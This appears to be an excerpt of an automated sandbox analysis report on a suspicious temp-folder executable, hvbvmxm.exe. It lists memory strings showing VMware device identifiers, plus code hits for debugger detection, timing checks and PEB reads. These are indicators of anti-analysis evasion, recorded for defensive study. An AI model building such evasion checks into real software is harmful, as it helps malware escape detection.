Source: explorer.exe, 00000004.00000000.349893553.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.317884001.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.324860902.00000000085BD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.323779585.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.326086945.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000000.350579899.000000000858E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.349521692.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040AA3F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0041273A GetProcessHeap, 1_2_0041273A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE6A60 rdtscp 3_2_00AE6A60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0041141B mov eax, dword ptr fs:[00000030h] 1_2_0041141B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040ED78 mov eax, dword ptr fs:[00000030h] 1_2_0040ED78
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h] 1_2_00B80019
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h] 1_2_00B80005
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h] 1_2_00B8007A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h] 1_2_00B80149
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h] 3_2_00AF90AF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE20A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h] 3_2_00AEF0BF
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h] 3_2_00AB9080
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h] 3_2_00B33884
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h] 3_2_00AB58EC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h] 3_2_00AB40E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00B4B8D0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h] 3_2_00AE002D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h] 3_2_00ACB02A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h] 3_2_00B37016
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h] 3_2_00B84015
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h] 3_2_00B72073
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h] 3_2_00B81074
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h] 3_2_00AD0050
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h] 3_2_00B351BE
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h] 3_2_00AE61A0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h] 3_2_00B749A4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h] 3_2_00B369A6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h] 3_2_00AEA185
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h] 3_2_00ADC182
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h] 3_2_00AE2990
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00ABB1E1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h] 3_2_00B441E8
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h] 3_2_00AD4120
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h] 3_2_00AE513A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h] 3_2_00AE513A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h] 3_2_00AB9100
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h] 3_2_00ABC962
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h] 3_2_00ABB171
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h] 3_2_00ABB171
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h] 3_2_00ADB944
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h] 3_2_00ADB944
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h] 3_2_00AB52A5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00ACAAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00ACAAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00AEFAB0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h] 3_2_00AED294
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h] 3_2_00AED294
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00AE2AE4
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h] 3_2_00AE2ACB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 3_2_00AF4A2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h] 3_2_00AF4A2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B7AA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h] 3_2_00B7AA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC8A0A mov eax, dword ptr fs:[00000030h] 3_2_00AC8A0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD3A1C mov eax, dword ptr fs:[00000030h] 3_2_00AD3A1C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov ecx, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB5210 mov eax, dword ptr fs:[00000030h] 3_2_00AB5210
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ABAA16
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF927A mov eax, dword ptr fs:[00000030h] 3_2_00AF927A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h] 3_2_00B6B260
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6B260 mov eax, dword ptr fs:[00000030h] 3_2_00B6B260
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88A62 mov eax, dword ptr fs:[00000030h] 3_2_00B88A62
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7EA55 mov eax, dword ptr fs:[00000030h] 3_2_00B7EA55
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B44257 mov eax, dword ptr fs:[00000030h] 3_2_00B44257
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB9240 mov eax, dword ptr fs:[00000030h] 3_2_00AB9240
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4BAD mov eax, dword ptr fs:[00000030h] 3_2_00AE4BAD
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B85BA5 mov eax, dword ptr fs:[00000030h] 3_2_00B85BA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 3_2_00AC1B8F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC1B8F mov eax, dword ptr fs:[00000030h] 3_2_00AC1B8F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6D380 mov ecx, dword ptr fs:[00000030h] 3_2_00B6D380
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2397 mov eax, dword ptr fs:[00000030h] 3_2_00AE2397
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7138A mov eax, dword ptr fs:[00000030h] 3_2_00B7138A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEB390 mov eax, dword ptr fs:[00000030h] 3_2_00AEB390
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00ADDBE9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE03E2 mov eax, dword ptr fs:[00000030h] 3_2_00AE03E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h] 3_2_00B353CA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B353CA mov eax, dword ptr fs:[00000030h] 3_2_00B353CA
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7131B mov eax, dword ptr fs:[00000030h] 3_2_00B7131B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABDB60 mov ecx, dword ptr fs:[00000030h] 3_2_00ABDB60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 3_2_00AE3B7A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE3B7A mov eax, dword ptr fs:[00000030h] 3_2_00AE3B7A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88B58 mov eax, dword ptr fs:[00000030h] 3_2_00B88B58
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABDB40 mov eax, dword ptr fs:[00000030h] 3_2_00ABDB40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABF358 mov eax, dword ptr fs:[00000030h] 3_2_00ABF358
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC849B mov eax, dword ptr fs:[00000030h] 3_2_00AC849B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36CF0 mov eax, dword ptr fs:[00000030h] 3_2_00B36CF0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B714FB mov eax, dword ptr fs:[00000030h] 3_2_00B714FB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88CD6 mov eax, dword ptr fs:[00000030h] 3_2_00B88CD6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEBC2C mov eax, dword ptr fs:[00000030h] 3_2_00AEBC2C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71C06 mov eax, dword ptr fs:[00000030h] 3_2_00B71C06
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8740D mov eax, dword ptr fs:[00000030h] 3_2_00B8740D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36C0A mov eax, dword ptr fs:[00000030h] 3_2_00B36C0A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD746D mov eax, dword ptr fs:[00000030h] 3_2_00AD746D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h] 3_2_00B4C450
